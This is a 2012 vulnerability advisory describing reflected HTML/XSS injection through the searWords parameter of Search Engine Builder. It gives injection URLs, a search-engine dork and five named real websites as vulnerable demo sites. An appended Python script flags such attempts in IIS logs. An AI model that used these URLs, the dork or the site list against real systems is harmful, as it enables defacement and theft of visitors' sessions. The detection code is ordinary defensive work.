Search Engine Builder (XSS/HTML) Injection Vulnerabilities

Software  : Search Engine Builder
Date      : 2/20/2012
Vendor    : http://www.aleadsoft.com
Get App.  : http://www.aleadsoft.com/SearchMakerSetup.exe
Platform  : Windows
Language  : ASP
Tested on : Windows
Dork      : "Powered by Search Engine Builder"
Author    : ITTIHACK
Home      : http://ittihack.com

Description:
Aleadsoft develops both GUI software and a web application to create a search engine for your own website. All of these products run on Windows systems and IIS servers, including Win 9x/ME/NT/2000/XP/2003/Vista/Win7.

Exploit:
Inject your HTML/XSS code in the search box:
http://site/path/search.php?searWords=[Evil]
http://site/path/searchsimple.asp?searWords=[Evil]

Demo:
Inject the codes below in the search box (examples):

1) HTML:

ITTIHACK

2) XSS:
"

Demo sites:
http://laramiecounty.com/_departments/_sheriff/search.asp
http://abytel.com/search/searchsimple.asp
http://ottawamalayali.ca/SearchEngine/search.php
http://www.h-e-r-m-e-s.org/search.asp
http://www.broseley.org.uk/search.asp

May Allah have mercy on the martyrs of Syria
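As an added defender-side example (not part of the advisory), the following Python scans IIS W3C log lines for requests to the search scripts named above whose searWords value carries markup, so that attempts against the reflected parameter can be spotted in server logs. The seven-field log layout and the sample lines are constructed assumptions.

```python
"""Flag IIS log requests that push markup through the 'searWords' parameter
of Search Engine Builder's search scripts (added detection example)."""
import re
from urllib.parse import parse_qs, unquote_plus

# Script names taken from the advisory; matched as a suffix of cs-uri-stem.
VULNERABLE_SCRIPTS = ("/search.asp", "/searchsimple.asp", "/search.php")
# Angle brackets and a javascript: scheme have no place in a plain search term.
MARKUP_RE = re.compile(r"[<>]|javascript:", re.IGNORECASE)

# Constructed sample lines in an assumed W3C field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2012-02-20 10:01:02 203.0.113.5 GET /search.asp searWords=widgets 200
2012-02-20 10:01:09 203.0.113.5 GET /search.asp searWords=%3Cb%3Etest%3C%2Fb%3E 200
2012-02-20 10:02:30 198.51.100.7 GET /searchsimple.asp searWords=%22%3E%3Cscript%3E 200
2012-02-20 10:03:00 198.51.100.7 GET /about.asp page=%3Cb%3E 200
2012-02-20 10:04:12 192.0.2.9 GET /search.php searWords=a%20%22quoted%22%20term 200
"""

def parse_line(line):
    """Split one W3C line into its fields; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    date, time, ip, method, stem, query, status = parts
    return {"ts": f"{date} {time}", "ip": ip, "method": method,
            "stem": stem.lower(), "query": query, "status": status}

def suspicious_searches(log_text):
    """Return (timestamp, ip, stem, decoded searWords) for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["stem"].endswith(VULNERABLE_SCRIPTS):
            continue
        # parse_qs URL-decodes once; unquote_plus again catches double encoding.
        for value in parse_qs(rec["query"]).get("searWords", []):
            decoded = unquote_plus(value)
            if MARKUP_RE.search(decoded):
                hits.append((rec["ts"], rec["ip"], rec["stem"], decoded))
    return hits

if __name__ == "__main__":
    for hit in suspicious_searches(SAMPLE_LOG):
        print(*hit)
```

The fifth sample line (a quoted phrase search) is deliberately not flagged, since plain quotes are common in legitimate queries; the non-search script in the fourth line is skipped entirely.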